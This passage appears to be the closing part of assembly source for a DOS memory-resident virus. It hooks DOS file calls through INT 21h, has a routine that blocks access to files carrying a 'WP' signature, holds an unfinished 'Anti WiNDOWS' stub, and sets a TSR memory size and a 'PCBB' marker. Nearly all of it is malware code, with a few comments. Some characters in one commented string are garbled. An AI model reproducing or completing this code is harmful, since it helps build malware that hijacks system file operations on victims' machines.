cmp cx,3
|
|||
|
jne close_wp
|
|||
|
|
|||
|
cmp word wpbuff[1],'PW'
|
|||
|
|
|||
|
jne close_wp
|
|||
|
|
|||
|
inc si
|
|||
|
close_wp:
|
|||
|
mov ah,3Eh
|
|||
|
call int21
|
|||
|
cmp si,0
|
|||
|
je not_wp
|
|||
|
|
|||
|
fuck_wp: pop si
|
|||
|
call reset_i24
|
|||
|
call pop_all
|
|||
|
popf
|
|||
|
mov ax,4
|
|||
|
stc
|
|||
|
retf 2
|
|||
|
not_wp:
|
|||
|
mov ah,3Dh
|
|||
|
ret
|
|||
|
|
|||
|
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|||
|
; Anti WiNDOWS Routine
|
|||
|
; (Just started... Not at all ready!!!)
|
|||
|
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|||
|
windows:
|
|||
|
ret
|
|||
|
|
|||
|
;; call push_all
|
|||
|
; xchg cx,ax
|
|||
|
; mov di,dx
|
|||
|
; push ds
|
|||
|
; pop es
|
|||
|
; cld
|
|||
|
; xor al,al
|
|||
|
;winsrc: repnz scasb
|
|||
|
; jne win_fail
|
|||
|
;
|
|||
|
; sub di,8
|
|||
|
; xchg si,di
|
|||
|
|
|||
|
|
|||
|
;db 'Elo<6C>, Elo<6C>, lam<61> sabakt<6B>ni?'
|
|||
|
|
|||
|
dummy db 18h dup(0) ;3
|
|||
|
|
|||
|
version db ver ;\
|
|||
|
size dw (offset total)-100h ; > 6 bytes
|
|||
|
db 'PCBB' ;/
|
|||
|
|
|||
|
total:
|
|||
|
tsr_para equ ((1024*6)/16) +2 ;equ (($-100h / 16)+2)*2
|
|||
|
|
|||
|
|
|||
|
|